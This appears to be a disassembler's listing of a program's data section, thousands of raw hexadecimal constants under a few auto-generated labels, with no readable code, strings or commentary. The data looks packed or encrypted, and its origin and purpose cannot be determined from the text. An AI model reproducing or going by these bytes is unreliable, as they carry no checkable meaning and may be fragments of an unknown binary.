dd 9EC1B9FFh, 133CC083h, 4EA6AC04h, 39F633FCh, 0F772B782h
dd 4875F875h, 5FC6814h, 646A3822h, 3DF7CCD6h, 1B22C4C8h
dd 0EF181322h, 34D9333Bh, 74141C16h, 3870FF14h, 0BAFB500Fh
dd 0FC8B1682h, 14EA1009h, 0BE7C00A2h, 0F8D8E0CCh, 192EE14Bh
dd 5F7DCC86h, 8EB70F10h, 763F01CAh, 2A2170ACh, 0F1BE8D28h
dd 74C73B07h, 0EEF6C812h, 4508BFFh, 8950088Bh, 451890Ah
dd 0EB5E441Bh, 0B7D41DE8h, 3F723D8Fh, 1FC4588Dh, 2C603D83h
dd 41750419h, 0CF15B6Fh, 0BA3C4E8Dh, 46880B02h, 0FD8CD40h
dd 0D24CA1DBh, 568AC91Ah, 0EBA01D40h, 0B64023D9h, 0FFDC4ABBh
dd 10E1EE76h, 3407B67Eh, 47868D2Eh, 0B10C354Fh, 114528Fh
dd 0FF03DC56h, 87A9141Ah, 8B2ED10Eh, 1FFF85F8h, 73F355B4h
dd 678308A9h, 47C70018h, 0DE1011Ch, 6007375h, 460D0624h
dd 0B28E8D0Eh, 0FBC74F8Fh, 8A204789h, 86889E25h, 0F6B7F776h
dd 438B1A67h, 1F1F8904h, 7B893804h, 18968A04h, 0B367DB36h
dd 7505AC97h, 40D015h, 5EEC8E76h, 0FF4D4758h, 0EB0BC4B6h
dd 36587607h, 0A5361B1Ch, 3D078550h, 2F34E180h, 51CD9B3Ch
dd 4F8B6369h, 1890719h, 0DEC966C6h, 735A4889h, 645EC260h
dd 0C7C06E7Bh, 0B6C4B2ABh, 3399B008h, 0BD02CDDDh, 9D835AD0h
dd 8BB8B657h, 0B84DF21Dh, 80112B0Ah, 6FB2AC3h, 0C01B2B59h
dd 0BB9D31Eh, 8D30D0DFh, 83CC8E5Dh, 0D308247Ch, 2DFEE10Fh
dd 470C9901h, 8A3008Bh, 0C058A06Bh, 0C9C2B1B6h, 0DD796CCh
dd 9A4B6017h, 79BBBFB8h, 7FE00EDBh, 80605E8Bh, 44750E3Bh
dd 8BF84B8Bh, 6D4DC253h, 0F0B7F017h, 0FF330C0Bh, 0D9E0F981h
dd 0C410F445h, 0F8ED9BD2h, 0E40D4174h, 5D8D3974h, 75FB52FBh
dd 509A4DBBh, 3E507751h, 0BF510964h, 97E04B0Dh, 322FD2EAh
dd 187E89D2h, 301C4689h, 0C225768Bh, 44C78BC4h, 16F0D9F0h
dd 30FF51CDh, 74544C60h, 2D23EDCAh, 85F06B9Fh, 0CDB58F6h
dd 0DB6446C6h, 0DDFBBF63h, 3B896846h, 850F044Bh, 0F983153Ch
dd 33820F0Dh, 0DB37F41Eh, 55D81A37h, 0CA3B0CC2h, 7D812210h
dd 0C1EA16F8h, 9759F7Fh, 0C61846C7h, 23F66673h, 8BE3D85Ch
dd 719F8D1Ah, 488D1C4Eh, 0E106050Ch, 8B20F6DBh, 55CBD740h
dd 0EC5D8924h, 0B16F874Ah, 928F46BFh, 2BE4878Dh, 318906F4h
dd 0C2C8C678h, 97567089h, 5D8B13CBh, 585B4200h, 481D430Fh
dd 0CD2CBAC6h, 0B746CD20h, 68577746h, 10F9D52Bh, 0C1DBF7B9h
dd 170B6185h, 1DF43135h, 0B2AAC0Ch, 0B5748A0Dh, 286E3BE4h
dd 0DB80B5A1h, 459C4189h, 444449F0h, 0E0866170h, 4EA6E689h
dd 0B2727670h, 0EC9706F1h, 9F2C569Bh, 0C5F58860h, 7389CB73h
dd 62CDEE43h, 2278C687h, 8612657h, 169F08BEh, 6205C5DFh
dd 1424BDDBh, 8BC81CBBh, 0CC3EDE77h, 7DCD9399h, 0C390CF1h
dd 0D3B81002h, 1CEBB3E1h, 0BE80575h, 0EB30A303h, 0CF6CE04Ah
dd 0DD56D866h, 0C9410D12h, 204356CCh, 3C6BAF49h, 522516h
dd 52035D41h, 2F9A490Dh, 5F1B0073h, 5B4E5700h, 240524C1h
dd 0DC08D110h, 50701BA2h, 305E8D7Ah, 4566538Ah, 0FC45BBA1h
dd 0FA05000Ah, 0B5D9F33Bh, 972B90Bh, 0CF0121Ch, 0E6CD0EF2h
dd 7EF464F3h, 1AEA18E8h, 0C6FF8EECh, 0D7F88B5Eh, 2175C084h
dd 140C45ABh, 59270F82h, 33207E8h, 236C2335h, 564C363Bh
dd 0EA48418Ah, 5B9103F6h, 2C211BBh, 0C063F0Bh, 0C8F3E488h
dd 0E1A10E7h, 0C018D814h, 0F9E41C0Bh, 2079F9F9h, 7C24103Eh
dd 0CC82813h, 1C0D9A2Ch, 766385AEh, 3A5D0284h, 0A6685CCh
dd 144ADDFDh, 0ADEED62Ch, 8B1E641Bh, 0A17C2003h, 7890E68h
dd 0F9F4FE42h, 780804D8h, 0EB3D8904h, 3E42C606h, 0A75B01B0h
dd 7F2E9142h, 832F00C7h, 9C6B5D8Eh, 344B1806h, 0D9422259h
dd 2C0B6BDEh, 1863031Ch, 9BB4389Fh, 0DE02EB3Ah, 0BE56B58Fh
dd 878CF709h, 4CCEDF58h, 0B60C5CA2h, 93319BDBh, 4B584EB8h
dd 610C7D83h, 0C190FF21h, 3E7883D2h, 0CE2E9D75h, 40C71EEBh
dd 0B1157E18h, 155603A7h, 0D22F3520h, 2A5E78E0h, 2184059h
dd 0F7CC7810h, 50AB527Eh, 60158A18h, 2EB2A06Dh, 854A22F6h
dd 58735672h, 0EB53C68Ch, 36B2A274h, 0C631ECEBh, 0DE56DD1Ch
dd 6285E75h, 37DEC86Ch, 28340CAAh, 0C36B7258h, 0F85DE223h
dd 83E04E57h, 68C0B511h, 0D2FC728Fh, 0FBC52E79h, 8FE4B7E9h
dd 5EB7B54h, 8D72B860h, 0C556456h, 0BFDB7F74h, 0EB367F89h
dd 647E80F0h, 684E3700h, 60518B53h, 5A6A418Bh, 0E91B5230h
dd 0AFFB810Ch, 0DAE0708h, 0A285C0A9h, 375D8CFh, 0F4ADB22Ch
dd 105866A5h, 428B18B8h, 0C8070B08h, 73483495h, 30FCA95Bh
dd 0EB1EEC18h, 0D08A1029h, 4617DCDh, 2E0AB5Ch, 4CFEBBD4h
dd 190F0977h, 3F5F2CF8h, 2C41E353h, 0D8FC480Fh, 0FCAEDB85h
dd 0F1D5DFFFh, 81102955h, 10008FAh, 8D477540h, 7B8D0E71h
dd 0A566A524h, 5B10288Bh, 300715ADh, 542B765Ch, 69F3DE90h
dd 19C46383h, 1DAEDB30h, 201A0CEBh, 0EDC1F612h, 9660DD6h
dd 14076604h, 0B2920A1h, 0ED9E95DDh, 94E36EBh, 0AB4DD618h
dd 2BDBAB66h, 2A07F335h, 1F42F63Eh, 56CED80Bh, 0C271430h
dd 0DB1A93EDh, 0A11947Ch, 0BC525114h, 0C3DDDC38h, 930CE0DBh
dd 8D3D10AFh, 2961470h, 0D3330807h, 8D5967D9h, 2A1C87DEh
dd 55908B21h, 216FB205h, 0D771057Bh, 22EB5850h, 0D03FDB20h
dd 921B0F06h, 8330528Bh, 4C50F121h, 4CB87E16h, 3C503769h
dd 833C0451h, 0F8522325h, 3A009980h, 0AF4F2318h, 0D33CECACh
dd 0CF0BF18Bh, 5109F1Dh, 88F93BB9h, 0A5FCF096h, 32943B60h
dd 8D5280C7h, 7D3BC478h, 7CA25F0Eh, 40970040h, 0FC3C478Bh
dd 8499E869h, 6CD30870h, 5A1DA857h, 1CFEE703h, 41D88FE3h
dd 528AD772h, 18EBD72Ah, 61708C31h, 3D200F24h, 0DF24770Ch
dd 0BE0C2F09h, 48A73FF4h
dd 0BEEFE337h, 89CF4AF4h, 0DCB8F77Dh, 0B6FB5B3Ah, 118F8B6h
dd 0F6FCE7B4h, 9AD7E141h, 0B674FBBBh, 0B376F3A6h, 19481BEDh
dd 7F839A3Ah, 0D051E244h, 16633661h, 1644D3C1h, 0D195B231h
dd 0D8BE552h, 0A2BA28F6h, 1E56D3E3h, 0AA6076A7h, 74E02254h
dd 7FFF61A3h, 6253A9F9h, 0C14D8B3Ah, 0D285118Bh, 0C28B0674h
dd 0F6EB108Bh, 16C6E083h, 0B4F47BAEh, 0EB0AA853h, 58EE2F8Eh
dd 0CA64B2Dh, 801A2083h, 29747682h, 14A0CF13h, 5EA8451h
dd 5638C390h, 3F964D42h, 6BEFEF14h, 99FF0BF7h, 6BAD086h
dd 5060460Ah, 7BC637Ch, 39868CBBh, 0B3D3BAA8h, 10E334F4h
dd 2464670Ch, 0A7923CA2h, 0F0772321h, 0F86C0313h, 5C7BDC5Bh
dd 3FF0D6Ah, 8B19755Ah, 112C4BA5h, 0A750A17Ch, 722D7744h
dd 0FB5BE519h, 30667B6h, 1CEB2A4Bh, 0A731859h, 76CF488Bh
dd 77CEF823h, 4F057314h, 401D13EBh, 1AD02D08h, 232C66B4h
dd 0DC1BA9EBh, 2C0BD5EAh, 3602148Bh, 39C1F67Bh, 0C16BBA67h
dd 1084108Fh, 0D85F13DCh, 8B336DCh, 762018A5h, 207D027Fh
dd 5F2D2DF8h, 65831404h, 0FE6234F4h, 0BF0D76FFh, 688940DBh
dd 0D950184Dh, 7D39C33Dh, 6097731Ch, 0C7EB1BE8h, 0B11C452Bh
dd 3AB04BA2h, 404321FDh, 7C3873FFh, 9EC567DFh, 8A2446ECh
dd 99274053h, 0D7F80F8h, 528B800Ah, 0F4752BBAh, 7815B2C9h
dd 3BC24C4Fh, 580EC34h, 26403636h, 0D81D6634h, 5E247565h
dd 68EB5EB3h, 0A16B41BAh, 0C9856846h, 55C0C137h, 4FEE51D8h
dd 49F17983h, 6152E1A9h, 8492574h, 59B28954h, 0E7C5CB63h
dd 0B7814E2h, 0F80FDA85h, 1C608014h, 364C781Ah, 0A5F62155h
dd 0A5F302E0h, 0F303E182h, 0D2701DA4h, 442F600h, 1A107C8Dh
dd 7DB073Dh, 18B334FCh, 4D486083h, 694408CEh, 2517631Bh
dd 55CF8388h, 0B9258B10h, 8DF01FBBh, 3C4A7383h, 40428911h
dd 133ED405h, 0B3C691Bh, 2D08C1A0h, 0AFB63087h, 24CE2E93h
dd 0AEF477F4h, 0C0999A23h, 448D83C1h, 85E4C08h, 291F4306h
dd 36707526h, 0F2D920D8h, 0ECE8EFE8h, 6C3E3874h, 514848E9h
dd 0DF1CA27Eh, 73F46EE6h, 2E54535Ch, 482C4434h, 0A95588DBh
dd 0BF208E44h, 156D2770h, 0D0B3F73Bh, 3C39710Ch, 5BA4743Ah
dd 0DFA6CC37h, 49D34160h, 46B2C340h, 8BC4D83Ah, 0AAD60235h
dd 0C34200C8h, 8BAD79Eh, 34068CD3h, 376B29D6h, 2C643F4Ah
dd 0EB30F09Ch, 1C16B805h, 2CD02320h, 84091CE1h, 8308716Ch
dd 94041534h, 0CCF2388h, 0CA57269Ch, 2342CF6h, 0C315709h
dd 0C1C1533Fh, 1B75E95Ah, 35DB14EBh, 0D98BC0ECh, 2075BEACh
dd 0A572DA2Bh, 83571393h, 0F8FBA4D8h, 1054DA12h, 2B74522Ch
dd 0D9F16102h, 0B02DCDB4h, 6CB23C75h, 3C6DB659h, 282C0230h
dd 0B06EED24h, 10748587h, 2D2CE62Ch, 5AADC62h, 0D083511Ah
dd 9D6F823Ah, 28BFFD09h, 4FB70FACh, 9AF52802h, 0D728FA46h
dd 63610E3Dh, 0F65BC64Bh, 399D21BBh, 95AA028h, 80E15B7h
dd 63118134h, 1DE5D6E6h, 830A021Fh, 9EEBB5CAh, 168AB58Bh
dd 20155960h, 0CC4388E6h, 3BE0011Ch, 0C06F6D80h, 890B7189h
dd 0C9180459h, 61D81378h, 0C857CA4Fh, 48701B22h, 72078B15h
dd 0D8C45C13h, 0B04B9436h, 6CB22F03h, 0A72D1BDBh, 56A1842h
dd 0C47E5A20h, 883BEDADh, 81048B34h, 5C7EC23Bh, 8DF423B3h
dd 368EE57h, 0BE530B74h, 0E75681E9h, 0E4403C1Bh, 8FFD1539h
dd 0F8503E8h, 22378B25h, 0A13D6A8Eh, 0A2586177h, 1A00059h
dd 0A8D4B38Bh, 0EF8DDDECh, 0DC89058Bh, 43240FEBh, 211C6A60h
dd 0B01B7ED0h, 3990BEDAh, 66CEBF31h, 8A156A37h, 0EC631675h
dd 0F0333BB9h, 0EC6E231Dh, 738B7136h, 6418354Dh, 574D7709h
dd 5968DE7Bh, 300558B6h, 30B4544Ch, 2E461B18h, 0C18D6CBh
dd 0AE545C48h, 79EC1950h, 125C3459h, 1DB7541Ah, 0DBBAFFEh
dd 9D8C90E8h, 53890405h, 4800C744h, 7D2BA31Ch, 3B01291Ah
dd 293BEC6h, 18EA44DBh, 7B43C770h
dword_4439A4 dd 631E5306h db 0B7h, 10h, 22h
byte_4439AB db 0BAh ; DATA XREF: sub_449577+3�o
dd 0C03EA48Eh, 63B96F5h, 34214CC6h, 0E512840Ch, 6130B9A0h
dd 48845D14h, 0D721BB35h, 0E2A3526h, 0C90729E8h, 0B259F758h
db 0A6h
dword_4439D5 dd 6B570A78h db 91h, 68h, 84h
dd 1875B58Ah
db 7Bh
dword_4439E1 dd 0DE006E0Fh dword_4439E5 dd 6FD40A29h db 1Ah, 6Ah, 1Bh
dd 59107A8Dh, 0E02C9F07h, 0E14D1858h, 7C06BFF3h, 9C92E1Dh
dd 984E1051h, 3700A050h, 43B7991Ah, 6B863232h, 0CFC4632h
dd 0A64D4DCEh, 0A360398Ch, 0AB4665Bh, 0D6DB632h, 0AA640AD7h
dd 7A084A31h, 0D8FB7759h, 664AD1DEh, 14AAE0CAh, 8571324Bh
dd 118142C0h, 939C0C68h, 47AB5FA8h, 8F0C605Ch, 428E14B9h
dd 84F2D3CBh, 19315300h, 800E843Bh, 8A605CBBh, 6ECCEC27h
dd 66E290A4h, 4E5C8D80h, 4145670Ah, 8897C46Eh
db 0, 0FAh
dword_443A76 dd 25300C88h dw 8191h
dd 1D1038ECh, 25CC2BC4h, 7BF1257h, 0B9AECD68h, 0BAFF3304h
dd 80D9E6C3h, 0DCDAD896h, 6C9EFC04h, 0C8123B3Eh, 0CC0ECA0Ch
dd 0B18D010h, 0D27CD991h, 0F820D41Ah, 0D0289466h, 13E0036Dh
dd 0FD22CE2h, 1740D5D4h, 3056A253h, 656DA008h, 8D57C228h
dd 5B61995Dh, 1ED6A736h, 0C81C80Ah, 0CB21B758h, 0C83BD011h
dd 8B7D0500h, 3B180F6Ch, 3DB611D8h, 2284788Ch, 1F6F3FEEh
dd 0B809ECBAh, 8DF82004h, 0E7C17F0Ch, 0C42DB419h, 21C448EEh
dd 0DC0744D5h, 0ACE877F4h, 773A56EFh, 818953BFh, 0DC608D45h
dd 0B541D106h, 8C00F6E0h, 17A096DEh, 8BE04D5Bh, 0C1287D31h
dd 99A04581h, 0B9A2AFACh, 0DFFF4BBh, 0FF50BAB6h, 73738DC2h
dd 2E8932B8h, 0DF006A9Ah, 0B5F87A8Dh, 6675B6E5h, 8830DF8h
dd 2EC0304h, 0D68E96FBh, 279D06F4h, 1BE90114h, 6E6DF0B4h
dd 7B85B217h
db 37h, 5Eh
dword_443B72 dd 460014F0h dw 19B9h
dd 150CFF1Eh, 0A00CFEEEh, 0CABBA093h, 0E35F3889h, 1C31C651h
dd 0E2797BD4h, 8B8C6C6Ah, 0F4D7371h, 591B0FE0h, 39A32CD3h
dd 21C363A2h, 1A1EFBC3h, 5AD1130Ch, 0D71282Bh, 41828C14h
dd 83642673h, 750EBA43h, 0A80EE017h, 35978308h, 0D5B9C38h
dd 0F893904Ch, 481A9BD2h, 147B8128h, 75FCC401h, 34ACB807h
dd 0EB2AA6D8h, 0B9574637h, 5278A445h, 0C053093Ch, 1BD5304h
dd 8740735Ah, 4CD9682Fh, 0FDC468F1h, 6A5F9BBDh, 8BBF3B1Dh
dd 0A354BE4Ch, 14798193h, 0A17F06h, 8D6D01AEh, 0DC388120h
dd 0D0057605h, 1B1B6854h, 5E2C0600h, 9DDD3C72h, 5D142FA3h
dd 28302966h, 584A1911h, 6EA9C9Bh, 11BA5821h, 71516406h
dd 0E0EE818h, 7F674970h, 7F080211h, 0E085589Bh, 7427057Eh
dd 211D284Ah, 4D10B952h, 49C87A8Dh, 0C76687Dh, 8414468Ch
dd 7EA43957h, 5F182BABh, 8B104689h, 0C0E07C1Eh, 8156150Fh
dd 551DFAC3h, 0FF87B95Eh, 83560721h, 0ECEB60C3h, 0ED519AB8h
dd 4B181995h, 825373D6h, 0CCD57E74h, 0E43457DAh, 0B89A577h
dd 76320E83h, 8D47AA43h, 0FF477F47h, 0BEC9036h, 40F180CCh
dd 81478918h, 97078783h, 9E7C579Eh, 2DBD6057h, 8750AC5Ah
dd 7D68B43Eh, 0A3909805h, 663C6B3Ch, 0F06E81E0h, 0FF04C683h
dd 49937579h, 18BE450Ch, 58102D32h, 0D8901EF6h, 0BE9C712Ch
dd 0D8B4650h, 0BFEED048h, 147D0DFFh, 9B8D08Ah, 1588C83Bh
dd 55740754h, 1A2DFF06h, 0C459EF3Eh, 0DF3B098Bh, 1314F375h
dd 0D61B944Dh, 6F9B5379h, 8C359E97h, 754C56F9h, 44F01E47h
dd 4B541038h, 4503E158h, 0DE1A5718h, 0CA06C3C4h, 125FDD7h
dd 0F7502534h, 1CEB9710h, 102E1816h, 8733D58Ch, 0D1264492h
dd 553AB618h, 40081483h, 5A142F8h, 0B1CAA92Fh, 70BFD0EAh
dd 75899CABh, 8DF2507Ch, 55890E4Eh, 1B7558EEh, 3D35E6EDh
dd 5B80A5Ah, 83B08295h, 8C49BA80h, 7B99C51h, 558101C1h
dd 597860Fh, 483A09Bh, 8EEA4E8Fh, 0C0E52A74h, 350F607Eh
dd 1F1A7480h, 162ACA06h, 53270AA3h, 0F7C02A89h, 0C9282654h
dd 7461E177h, 0F4469E4Ah, 649D1274h, 388C58A9h, 0E0F45847h
dd 0F40064B7h, 430C4F30h, 8DCA5598h, 7827D027h, 3DD7BA1Fh
dd 4CA1BCA2h, 2A7A0310h, 45C7A942h, 0A84081E0h, 14B0DD08h
dd 76E58A54h, 72D6DF8Eh, 0FF2DA337h, 6A1FB9D3h, 47B42E0Eh
dd 0A238F34h, 0C51E41D6h, 21ADA256h, 10873159h, 0B7805736h
dd 4BD1C6Eh, 4450150Fh, 7F3AD737h, 0FA0C0951h, 0A266D0B0h
dd 53048A99h, 0BE87D54Ch, 0C25A9037h, 0FFD3A46Fh, 0D10C7B2h
dd 0EB343AC1h, 5152521Fh, 6A78C1D9h, 0D951387Dh, 0C9083056h
dd 53BF030Eh, 1FA53456h, 0E00225h, 27E78CB0h, 3AA1D41Ch
dd 6DBF80E5h, 31EA3C2Dh, 68870F0Bh, 0C60F3DCh, 0D9477188h
dd 10395F04h, 1A4D985Ah, 0FCD008AEh, 86D78123h, 11FC590Ch
dd 9C8726F0h, 0F8E4420Ch
db 0FCh
dword_443EA1 dd 812B3BFCh db 2Dh, 3Ah, 5Dh
dd 0E155D28Fh, 0C00C61Eh, 0C9D82C4Bh, 0C81C80Ch, 93DD0808h
dd 1463E591h, 8F8080Fh, 0F25388E4h, 0F84E8BF8h, 6803B38Dh
dd 0DB93E21Dh, 83880855h, 5E599BA6h, 0D42A0F9Ah, 4A890842h
dd 1C019E08h, 147111AFh, 19B82B65h, 45E9926Fh, 0D5C70C7Fh
dd 0C803D620h, 0D2C2454Ch, 0F3E010F2h, 0C7E38BAh, 3941E77h
dd 31089F21h, 2162CB11h, 0D48A1721h, 7EBE2156h, 7C503909h
dd 0D8F3C934h, 0DA2D73C2h, 0C0177F04h, 9C481EBEh, 74CEE144h
dd 7091D90Dh, 0E36F897Bh, 0B89374C2h, 0C203B67h, 0F350874h
dd 0ECAB7736h, 58D8EB8Fh, 219F0A96h, 1F07B299h, 41124143h
dd 5C25810Eh, 6D93FE0Fh, 775981F4h, 58604303h, 90C197D7h
dd 76CCC334h, 0D9B0AF44h, 0AF6D3B21h, 1AA3EC98h, 5C009A40h
dd 3DEC7509h, 4E158468h, 90EDB75Dh, 264A161Ch, 362E3B0Ah
dd 8B19A69h, 0CDEF29Bh, 0C90C6DF3h, 1B0D2901h, 3491A758h
dd 0DBEFDB93h, 0C298473Dh, 0F586E944h, 0E44308Dh, 2D1669CFh
dd 0E30C992Ah, 0C0755314h, 773B8DDh, 7E806014h, 1A4E7572h
dd 56E82ED2h, 0D2333987h, 79307495h, 0C4B1CA0Ch, 0B94DC048h
dd 0B7F76F4Dh, 588B167Ah, 811058ECh, 4C0FFFE3h, 8060B8Ch
dd 9B1B6F75h, 0D1037E0Ch, 1ED24A47h, 0E82DF56Bh, 89B9147Eh
dd 9246C616h, 78FDB85Ah, 1454053Bh, 0C8DE03EBh, 19764948h
dd 5A75235Ch, 10580192h, 0B76B2A3Ah, 0FC8C366Fh, 83EA754Fh
dd 66807966h, 24B61986h, 0C2521B50h, 0B6183C17h, 0BA0217C4h
dd 105D3956h, 2BCB1871h, 34C17D9Fh, 8CE083Eh, 0DF45718Bh
dd 615D759Ch, 0D214D375h, 59385814h, 5B50751Ch, 41C16DBBh
dd 0CEF85D1Dh, 6FDF0804h, 0F3CE6A97h, 1481450h, 0D33BF855h
dd 476B5AD2h, 18EBC84Eh, 0CEA1394h, 0A5A6D423h, 0FFFAB6EFh
dd 0D3CAEBB3h, 8F142139h, 6F61FDFAh, 41C60405h, 46F616D6h
dd 0CDC0506h, 8AE75BEBh, 8EF84A87h, 0C06056E4h, 6C5AE6E5h
dd 0ADE114A8h, 0AF0089AAh, 6B77DDB2h, 3B368B2Dh, 7C74A5F3h
dd 0EDCFEB3Ch, 3E754B77h, 72553D74h, 8B027714h, 6E0629C2h
dd 2BDF0BB7h, 970413D0h, 744DA4EBh, 76101BA0h, 0D686172Bh
dd 0F3DB04EFh, 0DB6B3DD2h, 0D9AD0368h, 0CB270CD4h, 9AB41229h
dd 0C22A18ABh, 0BB48202Ch, 11586DAh, 4E863711h, 0C243B54Bh
dd 8714CAAAh, 1F6F4665h, 6A57BDABh, 8B145906h, 40B856FEh
dd 91B410E3h, 0CC2D0D29h, 0A3EECD6Ah, 14A06DC4h, 2B61566h
dd 0E08812B3h, 50620241h, 533C50D7h, 0CEE029Ch, 1EFE6FCCh
dd 66087E8Dh, 59C01FD0h, 0E8EB4654h, 8069568Ah, 0CE0F7ADBh
dd 3114E52Eh, 0D6CCE7BDh, 0F454061Dh, 0D81E6820h, 0B0CF642Dh
dd 101D619Dh, 0A91A6500h, 5A554036h, 54B4BDEEh, 0FD6F462Dh
dd 2CB7FE34h, 0F98C8CA0h, 0ED6FF39Fh, 9AB854D6h, 273FF9D1h
dd 0C03EDA75h, 5F82078Eh, 5393513Ch, 0E42D4B8h, 5BAB3717h
dd 6ABABC57h, 49BE721Bh, 36DF87B2h, 0B6803F7h, 1FC0F919h
dd 3C8C020Bh, 0D2C44647h, 888EC800h, 0CC8CFC18h, 0ED02CB85h
dd 0F803C68Dh, 0C19C36B3h, 456C1A24h, 0BD63061Bh, 9A3F1781h
dd 770127D1h, 42987E4Dh, 0B06F908Bh, 33FBBD40h, 14C1830Ch
dd 0B6CDE9F7h, 8853A8F1h, 756E0F45h, 84473314h, 74477DB3h
dd 170F4D8Ah, 0F62032A4h, 62257031h, 0D052B1AEh, 80B806BEh
dd 9B3646Dh, 1F29A381h, 0FB1DB270h, 0E80C7982h, 43D1CE49h
dd 524194BEh, 6A705B53h, 0E0A45574h, 7E08B1B9h, 0BAF89E14h
dd 1CD06D5Bh, 1122C420h, 206023F6h, 0E0E82B76h, 305D8C7h
dd 0EF178018h, 6CE51E89h, 76C0F02Fh, 0FB3B8E90h, 0B7D1B771h
dd 0E39A0247h, 2B548F7Bh, 0FD5A9F8Bh, 880C97CCh, 0B020887h
dd 0F012D83Bh, 2223351Eh, 284619EAh, 4BEC64D4h, 22F31AF5h
dd 8021424Ch, 3320531Fh, 111735Bh, 8859683h, 8158819Ch
dd 0D0431C06h, 0B36216D1h, 1E4B4D99h, 4646D4BDh, 0D8FC4646h
dd 161FDC94h, 0B30D46F6h, 8D69A5CBh, 0BF61EFBDh, 4D89C78Bh
dd 0BF188BC5h, 81A305BBh, 0CC7EA257h, 0A508EC65h, 3DCA9411h
dd 263E3789h, 6C1B9D6Fh, 0EC0F1A49h, 31FFB602h, 35B3AB68h
dd 41500611h, 5EF7FFF0h, 8303FB6Ch, 0F093A227h, 3FBFA559h
dd 0B7398840h, 0FE1A53ABh, 833FFFFh, 4A8A21B3h, 0A90249Fh
dd 57E94385h, 212DC646h, 99EBB054h, 16D171Fh, 88B2970Eh
dd 31756D3Fh, 48051E3Ah, 0C689898Ah, 4848516Ch, 0FFED8BF5h
dd 46E27992h, 6B38BF02h, 0D78A3030h, 3435EE6Bh, 810C0506h
dd 0D939768Ah, 0BB3CCF0Ah, 231C03F3h, 5ADEE11Ch, 6A05FE56h
dd 7593A3ACh, 40A1933Bh, 13291B31h, 8200B45h, 46CE14A3h
dd 0C38BFBADh, 92C1234Bh, 70143CA6h, 946CA136h, 6C2EFBC3h
dd 8AE742B6h, 3D8AA172h, 0CD86DA04h, 0D04BF6C4h, 54F28B8Ah
dd 0E1330060h, 0C34A655Ch, 4C35806Fh, 4D389049h, 27B0D988h
dd 4E06C7DEh, 0F73F3023h, 81010660h, 3C05F552h, 20111836h
dd 0C36245C7h, 80C03240h, 1A4CF488h, 0C7B0EBA2h, 91598C47h
dd 6C128365h, 0D8721C4Dh, 0F0A02F6h, 0C2123C74h, 6B57DAB3h
dd 0CD960E10h, 8083E03Ch, 85D8074Fh, 0B4D1E0Eh, 0B947B83h
dd 7C0F0854h, 1EE88F54h, 0BE2DE793h, 2521BBBh, 10053575h
dd 47F61974h, 0BD0B8312h, 10759E00h, 87B5C6Ah, 0B86AC530h
dd 0A7F366BBh, 570A758Fh, 145A539Ah, 28C00163h, 52325702h
dd 2961B258h, 7B2CD0D1h, 0D0C639D3h, 8B717401h, 6419CC86h
dd 4F274BECh, 0CD9E8D53h, 219086CBh, 868E1919h, 464EEF86h
dd 5BCB960Eh, 13750154h, 5D25B157h, 0ACB656ACh, 0E6E7AB04h
dd 7B015428h, 9102CC05h, 0C8919191h, 91BCDCC4h, 0B8919191h
dd 81D0C0B4h, 0D4919199h, 2800E0D8h, 0FFC8C945h, 86EDE200h
dd 0E9049EE8h, 86F000BAh, 0BFC22356h, 0FB362170h, 5A4DBA01h
dd 3C708B0Eh, 0B454C603h, 41BC1C8Dh, 6F001006h, 6ED7C2D1h
dd 5EE0EB38h, 221A0163h, 26FCBADDh, 0B179014h, 4A76F17Ch
dd 71D7D7Ah, 0FADEE87Fh, 8AC2037Fh, 3ACB8A18h, 841A751Eh
dd 588A30C9h, 715E0C01h, 5D5015BBh, 11464690h, 0A3FFE275h
dd 5CF7605h, 4FD8401Bh, 2045831Bh, 0A6818302h, 3CC78B42h
dd 0FC3B9672h, 7AB357C5h, 4A33BC72h, 6A2D20EEh, 0CAD8FF0h
dd 2B00B70Fh, 455D8DF2h, 0B5B882D4h, 0DF810630h, 2BDAAA4Eh
dd 410C53FAh, 31706164h, 52B5C800h, 40313F4h, 0FB0ED60Fh
dd 6F743BA5h, 176C6F63h, 30191244h, 1752F453h, 78F14267h
dd 5677C167h, 4B4D94D5h, 0C6480EBCh, 40912BBEh, 811D0CA9h
dd 0E4562A02h, 0D55787F4h, 7870B0BEh, 3201638h, 157AECF2h
dd 4E752D0Bh, 32C8B24h, 0A05DFA74h, 5DB0DFA3h, 0C3200FECh
dd 4FFF3F53h, 1601220Fh, 0F486B62h, 50762051h, 56C14BD4h
dd 68839E9Eh, 6A382D34h, 57DA3EA9h, 1CA3311Ah, 12B0F348h
dd 1694205Dh, 85CF2048h, 60C2141Ch, 72177C87h, 7862EC18h
dd 0CEB347A3h, 5B923E50h, 66B58889h, 71055E2Bh, 0E230122h
dd 0FB67DE21h, 7F1745Fh, 2FA1E918h, 6F1463BBh, 53F95C7h
dd 505C3D24h, 0D15BF7h, 764544h, 7630069h, 0DDC2895Ch
dd 0B64876Dh, 7720073h, 9B75D7AEh, 30B611Bh, 3741D6Dh
dd 5D631B72h, 8CDF203Ch, 17633B55h, 1F748DC1h, 9B216E65h
dd 6DCF7D17h, 52ED4950h, 6F630007h, 0CC0DB642h, 5C0D6937h
dd 9440B327h, 866CA911h, 0BDB43218h, 685CF0D0h, 50092EA8h
dd 6809E25Eh, 0B281DA18h
dd 0D4F72153h, 50125606h, 28261C4Bh, 0E25A865Ah, 0DA958308h
dd 85B7F6ADh, 0AA58070Dh, 944D22C4h, 0FC685153h, 0D6EE6F3Bh
dd 98209476h, 0DC89C88h, 6FEB006h, 3EE6E462h, 142F14B4h
dd 0B6C0E0B8h, 8FF6DB2Dh, 0D002CC28h, 7E2057D4h, 3EE6880Ch
dd 2F0C68E8h, 2F737940h, 1816C41Bh, 568B1E24h, 1DE6A38h
dd 8B1BE215h, 59A146FAh, 0E0071AB8h, 16D16F0Dh, 920B8F7h
dd 89345E92h, 8BF57002h, 8940F25Eh, 78464B86h, 0C1156354h
dd 0B894FA22h, 47EECEFFh, 4586874h, 0FF0E6CA3h, 8648B8D6h
dd 157CF3C8h, 0EA484C50h, 0C1D0F41Ch, 29CC6A53h, 6F4DECF3h
dd 51833D73h, 2FF39659h, 0F0683440h, 0F07651F1h, 0F0980AC4h
dd 0D0FA012h, 32D45314h, 4A06D97Ah, 30CC12D8h, 0E5333013h
dd 0C3031D65h, 564430E0h, 0A0302A34h, 2B02B4C9h, 1F5064FDh
dd 654B01C8h, 697053D3h, 0EA0C4C6Eh, 177451ADh, 0FB490121h
dd 0FEDDAEFEh, 626D7953h, 4C631C6Fh, 394171Ah, 516C7452h
dd 0B36A8975h, 49790DB6h, 55086107h, 3173ED92h, 0A895431Bh
dd 642BB677h, 542B565Ch, 64506DADh, 29162D49h, 66FEAA6Bh
